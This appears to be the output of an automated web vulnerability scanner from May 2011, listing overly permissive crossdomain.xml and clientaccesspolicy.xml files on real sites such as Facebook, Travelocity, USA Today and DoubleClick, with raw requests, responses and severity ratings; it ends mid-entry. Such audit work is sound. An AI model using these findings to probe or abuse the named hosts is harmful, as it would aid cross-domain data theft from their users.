<allow-access-from domain="*.criticalmass.com"/> <allow-access-from domain="*.theodorealexander.com"/> <allow-access-from domain="*.hottopic.com"/> <allow-access-from domain="*.teamworkathletic.com "/> <allow-access-from domain="*.scene7.com"/> <allow-access-from domain="*.shopvcf.com"/> <allow-access-from domain="shopvcf.com"/> <allow-access-from domain="*.axelscript.com"/> <allow-access-from domain="*.sherwin.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.sherwin-williams.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.resource.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*flashmaxx.com"/> <allow-access-from domain="searsfb.indelible.tv"/> <allow-access-from domain="*.serving-sys.com"/> <allow-access-from domain="*.modea.com"/> <allow-access-from domain="*.mizunousa.com"/> <allow-access-from domain="*.mizunorunning.com"/> <allow-access-from domain="*.mizunocda.com"/> <allow-access-from domain="*.footjoy.com"/> <allow-access-from domain="*.footjoy.co.uk"/> <allow-access-from domain="*.footjoy.com.fr"/> <allow-access-from domain="*.footjoy.de"/> <allow-access-from domain="*.footjoy.se"/> <allow-access-from domain="*.footjoy.ca"/> <allow-access-from domain="*.footjoy.com.au"/> <allow-access-from domain="*.footjoy.jp"/> <allow-access-from domain="*.footjoy.co.th"/> <allow-access-from domain="*.footjoy.com.my"/> <allow-access-from domain="*.footjoy.com.sg"/> <allow-access-from domain="*.footjoy.co.kr"/> <allow-access-from domain="*.footjoy.com.cn"/> <allow-access-from domain="pitchinteractive.com"/> <allow-access-from domain="*.indelible.tv" secure="true" /> ...[SNIP]... <allow-access-from domain="indelible.tv" secure="true" /> ...[SNIP]... <allow-access-from domain="flashmaxx.com" secure="true" /> ...[SNIP]... <allow-access-from domain="searsfb.indelible.tv" secure="true" /> ...[SNIP]... <allow-access-from domain="ec2-184-72-166-175 <allow-access-from domain="*.getpapered.com"/> <allow-access-from domain="*.englishpapercompany.com"/> <allow-access-from domain="*.koolsquare.net"/> <allow-access-from domain="*.target.com"/> <allow-access-from domain="*.home.agilent.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.cos.agilent.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.lvld.agilent.com" secure="true" /> ...[SNIP]... <allow-access-from domain="cp.agilent.com" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.at" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.be" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.ca" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.ch" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.cl" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.co.hu" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.co.il" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.co.in" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.co.jp" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.co.kr" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.co.nz" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.co.th" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.co.uk" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.ar" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.au" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.br" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.cn" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.co" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.hk" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.mx" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.my" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.pe" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.ph" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.pl" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.pr" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.ru" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.sg" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.tr" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.tw" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.com.ve" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.cz" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.de" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.dk" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.ee" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.es" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.fi" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.fr" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.gr" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.ie" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.it" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.lu" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.nl" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.no" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.pt" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.ru" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.se" secure="true" /> ...[SNIP]... <allow-access-from domain="www.agilent.us" secure="true" /> ...[SNIP]... <allow-access-from domain="*.brooksbrothers.com"/> <allow-access-from domain="*.whitneyenglish.com"/> <allow-access-from domain="canadiantire.ca"/> <allow-access-from domain="*.maxnow.com"/> <allow-access-from domain="4.59.112.158"/> <allow-access-from domain="*.nike.com"/> <allow-access-from domain="*.converse.com" secure="false" /> ...[SNIP]... <allow-access-from domain="converse.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.converse.co.uk" secure="false"/> ...[SNIP]... <allow-access-from domain="converse.co.uk" secure="false"/> ...[SNIP]... <allow-access-from domain="*.cust.aops-eds.com"/> <allow-access-from domain="*.colehaan.com"/> <allow-access-from domain="kobe.nike.jess3.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.highschoolsports.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.kb24.com" secure="false" /> ...[SNIP]... <allow-access-from domain="kb24.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.skysports.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.lequipe.fr" secure="false"/> ...[SNIP]... <allow-access-from domain="converse.digitas.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.staging.groundctrl.net" secure="false"/> ...[SNIP]... <allow-access-from domain="staging.groundctrl.net" secure="false"/> ...[SNIP]... <allow-access-from domain="siteinnovation.digitas ...[SNIP]... <allow-access-from domain="siteinnovationdev.digitas ...[SNIP]... <allow-access-from domain="*.ny.rga.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.nikedev.framfab.dk" secure="false"/> ...[SNIP]... <allow-access-from domain="*.akqa.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ostkcdn.com"/> <allow-access-from domain="*.aggregateknowledge.com"/> <allow-access-from domain="*.nikedev.com"/> <allow-access-from domain="anthrode.uat.venda.com"/> <allow-access-from domain="anthropologie.custqa <allow-access-from domain="*.fingerhut.com"/> <allow-access-from domain="*.gettington.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://static.ak.fbcdn |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: static.ak.fbcdn.net |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain X-FB-Server: 10.138.64.186 Date: Sun, 15 May 2011 20:27:09 GMT Content-Length: 1473 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="s-static.facebook.com" /> <allow-access-from domain="static.facebook.com" /> <allow-access-from domain="static.api.ak.facebook <allow-access-from domain="*.static.ak.facebook.com" /> <allow-access-from domain="s-static.thefacebook.com" /> <allow-access-from domain="static.thefacebook.com" /> <allow-access-from domain="static.api.ak.thefacebook <allow-access-from domain="*.static.ak.thefacebook <allow-access-from domain="*.static.ak.fbcdn.com" /> <allow-access-from domain="s-static.ak.fbcdn.net" /> <allow-access-from domain="*.static.ak.fbcdn.net" /> <allow-access-from domain="s-static.ak.facebook.com" /> <allow-access-from domain="www.facebook.com" /> <allow-access-from domain="www.new.facebook.com" /> <allow-access-from domain="register.facebook.com" /> <allow-access-from domain="login.facebook.com" /> <allow-access-from domain="ssl.facebook.com" /> <allow-access-from domain="secure.facebook.com" /> <allow-access-from domain="ssl.new.facebook.com" /> ...[SNIP]... <allow-access-from domain="fvr.facebook.com" /> <allow-access-from domain="www.latest.facebook.com" /> <allow-access-from domain="www.inyour.facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://travel.travelocity |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: travel.travelocity.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:30:05 GMT Server: Apache Last-Modified: Thu, 07 Apr 2011 16:03:28 GMT ETag: "14376-6a3-3ffcb400" Accept-Ranges: bytes Content-Length: 1699 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.travelocity.com" secure="false" /> ...[SNIP]... <allow-access-from domain="www.travelocity.com" secure="false" /> ...[SNIP]... <allow-access-from domain="i.travelocity.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.travelpn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="i.travelpn.com.edgesuite ...[SNIP]... <allow-access-from domain="i.travelocity.com ...[SNIP]... <allow-access-from domain="travelocityf.download ...[SNIP]... <allow-access-from domain="ag.travelocity.com ...[SNIP]... <allow-access-from domain="hg.travelocity.com ...[SNIP]... <allow-access-from domain="design.int.travelocity ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.doubleclick.net" secure="false" /> ...[SNIP]... <allow-access-from domain="ad.*.doubleclick.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.aolcdn.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.dotomi.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.sabre.com" secure="false" /> ...[SNIP]... <allow-access-from domain="ach.travel.yahoo.net" secure="false" /> ...[SNIP]... <allow-access-from domain="travelrewardspn ...[SNIP]... <allow-access-from domain="*.travelocity.com" secure="true" /> ...[SNIP]... <allow-access-from domain="a248.e.akamai.net" secure="true" /> ...[SNIP]... <allow-access-from domain="fr.travelocity.ca" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://travel.usatoday |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: travel.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 25 Jan 2011 15:11:34 GMT Accept-Ranges: bytes ETag: "226a727a2bccb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 16 May 2011 01:19:34 GMT Connection: close Content-Length: 1507 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usatoday.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.usatoday.net" secure="true"/> ...[SNIP]... <allow-access-from domain="projects.usatoday.com"/> <allow-access-from domain="*.gannettonline.com"/> <allow-access-from domain="www.smashingideas.com" secure="true"/> ...[SNIP]... <allow-access-from domain="beta.tagware.com" secure="true"/> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="true"/> ...[SNIP]... <allow-access-from domain="maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="hostlogic.ca" secure="true"/> ...[SNIP]... <allow-access-from domain="pages.samsung.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="demo.pointroll.net" /> <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://webassets.scea.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: webassets.scea.com |
HTTP/1.1 200 OK Cache-Control: max-age=3600 Date: Sun, 15 May 2011 20:27:01 GMT Content-Length: 4479 Content-Type: text/xml ETag: "1ce49f2-117f-49aeb1 Expires: Sun, 15 May 2011 15:50:32 GMT Last-Modified: Fri, 28 Jan 2011 17:06:25 GMT Accept-Ranges: bytes Server: Level-3 Origin Storage/1.5 Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="www.us.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="us.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="secureus.playstation.com"/> <allow-access-from domain="fp.scea.com" secure="false"/> ...[SNIP]... <allow-access-from domain="stage.us.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="fp-stage.us.playstation ...[SNIP]... <allow-access-from domain="repl.us.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="fp-repl.us.playstation ...[SNIP]... <allow-access-from domain="fp.local.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="local.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="qa.us.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="qa.stage.us.playstation ...[SNIP]... <allow-access-from domain="qa-fp-repl.us.playstation ...[SNIP]... <allow-access-from domain="qa-fp-stage.us.plays ...[SNIP]... <allow-access-from domain="rae.us.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="stage.rae.us.playstation ...[SNIP]... <allow-access-from domain="repl.rae.us.playstation ...[SNIP]... <allow-access-from domain="qa.rae.us.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="qa.stage.rae.us ...[SNIP]... <allow-access-from domain="*.myresistance.net" secure="false"/> ...[SNIP]... <allow-access-from domain="sp-int.beta.myresistance ...[SNIP]... <allow-access-from domain="fp.sp-int.beta.myres ...[SNIP]... <allow-access-from domain="beta.myresistance.net" secure="false"/> ...[SNIP]... <allow-access-from domain="fp.beta.myresistance.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.socom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="www.socom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="fp.www.socom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="sp-int.socom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="fp.sp-int.socom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="beta.socom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="beta33.socom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="beta43.socom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="beta45.socom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="fp.beta.socom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="fp.beta33.socom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="fp.beta43.socom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="fp.beta45.socom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.littlebigworkshop.com" secure="false"/> ...[SNIP]... <allow-access-from domain="www.littlebigworkshop.com" secure="false"/> ...[SNIP]... <allow-access-from domain="fp.www.littlebigworkshop ...[SNIP]... <allow-access-from domain="stagea.us.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="proda.us.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="prodb.us.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="204.232.191.161" secure="false"/> ...[SNIP]... <allow-access-from domain="204.232.191.162" secure="false"/> ...[SNIP]... <allow-access-from domain="204.232.191.175" secure="false"/> ...[SNIP]... <allow-access-from domain="204.232.159.215" secure="false"/> ...[SNIP]... <allow-access-from domain="173.203.129.45" secure="false"/> ...[SNIP]... <allow-access-from domain="playstation.stage.lithium ...[SNIP]... <allow-access-from domain="boardsus-stage.us ...[SNIP]... <allow-access-from domain="boardsus.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="gap.opencirclecorp.com" secure="false"/> ...[SNIP]... <allow-access-from domain="rls.us.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="ogs.us.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="np.us.playstation.com" secure="false"/> ...[SNIP]... <allow-access-from domain="stage-webassets.scea.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://wow.weather.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: wow.weather.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:52 GMT Server: Apache SVRNAME: web2x01 Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2057 Keep-Alive: timeout=1, max=7463 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.weather.com" /> <allow-access-from domain="*.epicmashup.com" /> <allow-access-from domain="showcase.weather.com" /> <allow-access-from domain="*.chumby.com" /> <allow-access-from domain="*.imwx.com" /> <allow-access-from domain="*.rga.com" /> <allow-access-from domain="*.jnj.com" /> <allow-access-from domain="*.zyrtec.com" /> <allow-access-from domain="*.amazonaws.com" /> <allow-access-from domain="*.gigyahosting.com" /> <allow-access-from domain="*.gigyahosting1.com" /> <allow-access-from domain="media.pointroll.com" /> <allow-access-from domain="www.pointroll.com" /> <allow-access-from domain="data.pointroll.com" /> <allow-access-from domain="speed.pointroll.com" /> <allow-access-from domain="mirror.pointroll.com" /> <allow-access-from domain="adportal.pointroll.com" /> <allow-access-from domain="*.ge.com" /> <allow-access-from domain="*.inbcu.com" /> <allow-access-from domain="widgets.nbcuni.com" /> <allow-access-from domain="*.ivillage.com" /> <allow-access-from domain="devworks.ivillage.com" /> <allow-access-from domain="devi.ivillage.com" /> <allow-access-from domain="i.ivillage.com" /> <allow-access-from domain="www.ivillage.com" /> <allow-access-from domain="msnbcmedia.msn.com" /> <allow-access-from domain="*.tvpdigital.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="apps.eyewonderlabs.com" /> <allow-access-from domain="*.eyewonder.com" /> <allow-access-from domain="fjpecvaa.joyent.us" /> <allow-access-from domain="widget.bravotv.com" /> <allow-access-from domain="*.jwtdev.com" /> <allow-access-from domain="*.jwtweb.com" /> <allow-access-from domain="*.na.jnj.com" /> <allow-access-from domain="*2mdn.net" /> <allow-access-from domain="*.googlesyndication.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.facebook.com |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain X-FB-Server: 10.54.99.38 Connection: close Content-Length: 1473 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="s-static.facebook.com" /> <allow-access-from domain="static.facebook.com" /> <allow-access-from domain="static.api.ak.facebook <allow-access-from domain="*.static.ak.facebook.com" /> <allow-access-from domain="s-static.thefacebook.com" /> <allow-access-from domain="static.thefacebook.com" /> <allow-access-from domain="static.api.ak.thefacebook <allow-access-from domain="*.static.ak.thefacebook <allow-access-from domain="*.static.ak.fbcdn.com" /> <allow-access-from domain="s-static.ak.fbcdn.net" /> <allow-access-from domain="*.static.ak.fbcdn.net" /> <allow-access-from domain="s-static.ak.facebook.com" /> ...[SNIP]... <allow-access-from domain="www.new.facebook.com" /> <allow-access-from domain="register.facebook.com" /> <allow-access-from domain="login.facebook.com" /> <allow-access-from domain="ssl.facebook.com" /> <allow-access-from domain="secure.facebook.com" /> <allow-access-from domain="ssl.new.facebook.com" /> <allow-access-from domain="static.ak.fbcdn.net" /> <allow-access-from domain="fvr.facebook.com" /> <allow-access-from domain="www.latest.facebook.com" /> <allow-access-from domain="www.inyour.facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fingerhut.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.fingerhut.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 21 Sep 2010 21:58:02 GMT Accept-Ranges: bytes Content-Length: 430 Content-Type: text/xml X-N: S Date: Mon, 16 May 2011 01:32:53 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="convertlanguage.com"/> <allow-access-from domain="*.convertlanguage.com"/> <allow-access-from domain="fingerhut.com"/> <allow-access-from domain="*.fingerhut.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.fingerhut.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.fingerhut.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 21 Sep 2010 21:58:02 GMT Accept-Ranges: bytes Content-Length: 430 Content-Type: text/xml X-N: S Date: Mon, 16 May 2011 01:37:29 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="convertlanguage.com"/> <allow-access-from domain="*.convertlanguage.com"/> <allow-access-from domain="fingerhut.com"/> <allow-access-from domain="*.fingerhut.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.mcafeesecure |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mcafeesecure.com |
HTTP/1.0 200 OK Server: McAfeeSecure Cache-Control: private ETag: "EKdW2Rg2Poz" Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT Accept-Ranges: bytes Content-Type: text/xml; charset=utf-8 Content-Length: 116 Date: Mon, 16 May 2011 01:38:53 GMT <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.scanalert.com"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.mcafeesecure |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mcafeesecure.com |
HTTP/1.0 200 OK Server: McAfeeSecure Cache-Control: private ETag: "EKdW2Rg2Poz" Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT Accept-Ranges: bytes Content-Type: text/xml; charset=utf-8 Content-Length: 116 Date: Mon, 16 May 2011 01:37:35 GMT <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.scanalert.com"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.telegraph.co |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.telegraph.co.uk |
HTTP/1.0 200 OK Server: Apache ETag: W/"1150-1304607406000" Last-Modified: Thu, 05 May 2011 14:56:46 GMT Content-Length: 1150 Content-Type: application/xml Date: Mon, 16 May 2011 01:19:33 GMT Connection: close <cross-domain-policy> <allow-access-from domain="telegraph.co.uk"/> <allow-access-from domain="*.telegraph.co.uk"/> <allow-access-from domain="telegraphquiz.cfmx <allow-access-from domain="213.187.32.58"/> <allow-access-from domain="213.187.48.185"/> <allow-access-from domain="tgquiz.pavo.flarecreative <allow-access-from domain="ad.uk.doubleclick.net"/> <allow-access-from domain="st.sand.msn-int.com" secure="true"/> <allow-access-from domain="*.msn.com" secure="true"/> <allow-access-from domain="services.brightcove.com"/> <allow-access-from domain="admin.brightcove.com"/> <allow-access-from domain="*.videoegg.com"/> <allow-access-from domain="*.bebo.com"/> <allow-access-from domain="*.hi5.com"/> <allow-access-from domain="*.wayn.com"/> <allow-access-from domain="*.tagged.com"/> <allow-access-from domain="*.ringo.com"/> <allow-access-from domain="dailytelegraph.accuw <allow-access-from domain="skin.issuu.com" /> <allow-access-from domain="static.issuu.com" /> <allow-access-from domain="bestbuys.tmg.s3.amazonaws <allow-access-from domain="*.washingtonpost.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.orbitz.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.orbitz.com |
HTTP/1.1 200 OK Last-Modified: Wed, 11 May 2011 17:00:39 GMT ETag: "2b8-4a30303185bc0" Content-Type: text/xml Content-Length: 696 Server: Apache Date: Mon, 16 May 2011 01:29:50 GMT Age: 13611 Connection: keep-alive Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe <cross-domain-policy> <allow-access-from domain="media.pointroll.com"/> <allow-access-from domain="www.pointroll.com"/> <allow-access-from domain="submit.pointroll.com"/> <allow-access-from domain="data.pointroll.com"/> <allow-access-from domain="speed.pointroll.com"/> <allow-access-from domain="mirror.pointroll.com"/> <allow-access-from domain="mx.pointroll.com"/> <allow-access-from domain="geo.pointroll.com"/> <allow-access-from domain="ll.pointroll.com"/> <allow-access-from domain="clk.pointroll.com"/> <allow-access-from domain="clients.pointroll.com"/> <allow-access-from domain="fdaf.pointroll.com"/> <allow-access-from domain="demo.pointroll.net"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad-emea.doubl |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad-emea.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT Date: Mon, 16 May 2011 01:19:40 GMT <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 20:54:04 GMT Date: Sun, 15 May 2011 21:21:44 GMT <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.scorecardresearch.com |
HTTP/1.0 200 OK Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT Content-Type: application/xml Expires: Mon, 16 May 2011 21:31:00 GMT Date: Sun, 15 May 2011 21:31:00 GMT Content-Length: 320 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resou ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://content.usatoday |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: content.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT Accept-Ranges: bytes ETag: "80d976d8f2baca1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 16 May 2011 01:19:47 GMT Connection: close Content-Length: 730 <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://contextweb |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: contextweb.usatoday.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT Accept-Ranges: bytes ETag: "80d976d8f2baca1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Content-Length: 730 Date: Mon, 16 May 2011 01:19:45 GMT Connection: close <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://i.usatoday.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: i.usatoday.net |
